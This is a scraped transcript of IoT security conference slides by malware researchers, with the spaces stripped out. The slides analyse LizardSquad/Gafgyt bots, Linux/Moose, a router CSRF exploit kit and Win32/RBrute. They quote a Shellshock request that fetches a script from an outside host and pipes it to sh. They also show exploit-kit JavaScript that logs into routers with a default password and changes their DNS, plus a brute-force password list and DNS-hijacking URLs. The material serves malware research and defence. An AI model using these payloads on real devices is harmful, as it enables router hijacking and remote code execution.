IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses...
97
.
Transcript of IoT or Internet of - gosecure.github.io · only available to a set of whitelisted IP addresses...
.
IoTorInternetof{Things,Threats}
Thomas(@nyx__o)MalwareResearcheratESETCTFloverOpensourcecontributor
Olivier(@obilodeau)SecurityResearcheratGoSecurePreviouslyMalwareResearcheratESETInfoseclectureratETSUniversityinMontrealInfosecdeveloper,networkadmin,linuxsystemadmin
Co-founderMontrehack(hands-onsecurityworkshops)FounderNorthSecHackerJeopardy
AgendaAboutIOTLizardSquadLinux/MooseExploitKitWin32/RBruteConclusion
WhyItMatters?HardtodetectHardtoremediateHardtofixLowhangingfruitforbadguys
ARealThreatSeveralcasesdisclosedinthelasttwoyearsAlotofsame-oldbackgroundnoise(DDoSer)Thingsareonlygettingworse
Wait,isIoTmalwarereallyaboutthings?
No.Notyet.No.Notyet.
Sowhatkindofmalwarecanwefindonsuchinsecuredevices?
LizardSquadLizardSquad
WhoareLizardSquad?BlackhathackinggroupLotsofDistributedDenialofService(DDoS)DDoSPlayStationNetworkandXboxliveinChristmas2014BombthreatsDDoSforhire(LizardStresser)
DesCYBER-DesCYBER-CHENAPANS!CHENAPANS!
TheMalwareLinux/GafgytLinux/Powbot,Linux/Aidra,Kaiten,…Probablyothers,assourceispublic
CaracteristicsTelnetscannerFlooding:UDP,TCP,JunkandHold
SomeServerCode"*****************************************""*WELCOMETOTHEBALLPIT*""*Nowwith*refrigerator*support*""*****************************************"
AttackVectorsShellshockSSHcredentialsbrute-forceTelnetcredentialsbrute-force
ExempleofShellshockAttempt
GET/cgi-bin/authLogin.cgiHTTP/1.1Host:127.0.0.1Cache-Control:no-cacheConnection:Keep-AlivePragma:no-cacheUser-Agent:(){goo;};wget-qO-http://o.kei.su/qn|sh>/dev/null2>&1&
OtherVariantsHTTPSsupportCloudFlareprotectionbypass
Sophisticated?LizardStresserdatabasewasleakedPasswordsinplaintext…
IRCCommandandControl
-------Daychangedto08/25/15-------09:32-!-Thereare0usersand2085invisibleon1servers09:32-!-42unknownconnection(s)09:32-!-3channelsformed09:32-!-Ihave2085clientsand0servers09:32-!-20852119Currentlocalusers2085,max211909:32-!-20852119Currentglobalusers2085,max2119
BotMasters12:56-!-Topicfor#Fazzix:1k12:56-!-Topicsetbyvoid<>(WedAug1909:58:452015)12:56[Users#Fazzix]12:56[~void][~void_][@bob1k][@Fazzix][Myutro]·12:56-!-Irssi:#Fazzix:Totalof5nicks(4ops,0halfops,0voices,1normal)12:56-!-Channel#FazzixcreatedMonAug1703:11:29201512:56-!-Irssi:Jointo#Fazzixwassyncedin2secs
Linux/MooseLinux/Moose
Linux/MooseDiscoveredinNovember2014Thoroughlyanalyzedinearly2015PublishedareportinlateMay2015
MooseDNAakaMalwaredescription
Hangtight,thisisarecap
Linux/Moose…Namedafterthestring"elan"presentinthemalware
executable
Elan…?
TheLotusElan
ElánTheSlovakrockband(from1969andstillactive)
NetworkCapabilitiesPivotthroughfirewallsHome-madeNATtraversalCustom-madeProxyserviceonlyavailabletoasetofwhitelistedIPaddresses
Remotelyconfiguredgenericnetworksniffer
AttackVectorTelnetcredentialsbruteforceWordlistof304user/passentriessentbyserver
CompromiseProtocol
Anti-AnalysisStaticallylinkedbinarystrippedofitsdebuggingsymbolsHardtoreproduceenvironmentrequiredformalwaretooperateMisleadingstrings(getcool.com)
MooseHerdingTheMalwareOperation
ViaC&CConfigurationNetworksnifferwasusedtostealHTTPCookiesTwitter:twll,twidFacebook:c_userInstagram:ds_user_idGoogle:SAPISID,APISIDGooglePlay/Android:LAY_ACTIVE_ACCOUNTYoutube:LOGIN_INFO
ViaProxyUsageAnalysisNatureoftrafficProtocolTargetedsocialnetworks
AnExample
AnExample(cont.)
AnExample(cont.)
AnExample(cont.)
Anti-TrackingProxyaccessisprotectedbyanIP-basedWhitelistSowecan’tusetheproxyservicetoevaluatemalwarepopulationBlindbecauseofHTTPSenforcedonsocialnetworks
AStrangeAnimalnotintheDDoSorbitcoinminingbusinessnox86variantfoundcontrolledbyasinglegroupofactors
Status
WhitepaperImpactFewweeksafterthepublicationtheC&CserverswentdarkAfterareboot,allaffecteddevicesshouldbecleanedButvictimscompromisedviaweakcredentials,sotheycanalwaysreinfect
Aliveordead?
Yay!Except…
Linux/MooseUpdateNewsampleinSeptemberNewproxyserviceport(20012)NewC&CselectionalgorithmFewdifferencesStillunderscrutiny
ExploitKitTargetingExploitKitTargetingRoutersRouters
ExploitKitDefinitionAutomateexploitationTargetsbrowsersCommonexploitsareAdobeandJava
source:Malwarebytes
ExploitKitinAction
ExploitKitinAction(cont.)
Cross-SiteRequestForgery(CSRF)Usesdefaultcredential(HTTP)ChangesprimaryDomainNameSystem(DNS)
ExploitKitCSRF<html><head><scripttype="text/javascript"src<body><iframeid="iframe"sandbox="allow-same-origin"<scriptlanguage="javascript">
ExploitKitHow-Tofunctione_belkin(ip){varmethod="POST";varurl="";vardata="";url="http://"+ip+"/cgi-bin/login.exe?pws=admin"exp(url,"","GET");url="http://"+ip+"/cgi-bin/setup_dns.exe";data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="exp(url,data,method);}
ExploitKitcontinuallyimprovedObfuscationExploitsforCVEs
ExploitKit-CVECVE-2015-1187D-LinkDIR-636LRemoteCommandInjectionIncorrectAuthentication
RecapExploitKitChangeDNSFileless
WhatCanTheyDo?UniversalXSSonallHTTPsitesfetchingJavascriptona3rdpartydomainPhishingAdfraud
YouSaidAdfraud?InjectionviaGoogleanalyticsdomainhijackingJavascriptrunsincontextofeverypage
ExempleofGoogleAnalyticsSubstitution'adcash':function(){varadcash=document.createElement('script'adcash.type='text/javascript';adcash.src='http://www.adcash.com/script/java.php?option=rotateur&r=274944'document.body.appendChild(adcash);},
Win32/RBrute(cont.)Triestofindadministrationwebpages(IP)ScanandreportRoutermodelisextractedfromtherealmattributeoftheHTTPauthentication
Win32/RBruteTargets$stringsrbrute.exe[...]TD-W8901GTD-W8901GBTD-W8951NDTD-W8961NDTD-8840TTD-W8961NDTD-8816TD-8817TD-W8151NTD-W8101GZXDSL831CIIZXV10W300[...]DSL-2520UDSL-2600UDSLrouterTD-W8901GTD-W8901G3.0TD-W8901GBTD-W8951NDTD-W8961ND
Win32/RBruteBruteforceLogins:admin,support,root&AdministratorPasswordlistretrievedfromtheCnC
<emptystring>1111111234512345612345678abc123adminAdministratorconsumerdragongizmodoiqrquksmletmeinlifehackmonkeypasswordqwertyrootsoporteETB2006support
Win32/RBruteChangingDNS
http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Savehttp://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=
Win32/RBruteNextStepSimpleredirectiontofakeChromeinstaller(facebookorgoogledomains)Install(useractionrequired)ChangeprimaryDNSonthecomputer(viakeyregistry)
HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{networkinterfaceUUID}/NameServer
WhyreinfectsomeonebyRBruteandnotSality?
Win32/RBruteInACoffeeShop
InfecteduserInfectedrouterEveryoneisinfected
RBruteandSality
ConclusionEmbeddedmalware
NotyetcomplexToolsandprocessesneedtocatchupalowhangingfruitPreventionsimple
Thanks!Thankyou!SpecialthankstoESETCanadaResearchTeam
Questions?Questions?
@obilodeau@nyx__o
Referenceshttp://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdfhttp://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.htmlhttps://gist.github.com/josephwegner/1d20f1ce1d59b61172e1http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/
![LAB0: GETTING UP TO SPEED VERSION 1.9 Introduction to ...We will be using the Wireshark packet sniffer [wireshark.org] for these labs, allowing us to display the contents of messages](https://static.fdocuments.net/doc/165x107/5e7c44d141f898398b3f88df/lab0-getting-up-to-speed-version-19-introduction-to-we-will-be-using-the-wireshark.jpg)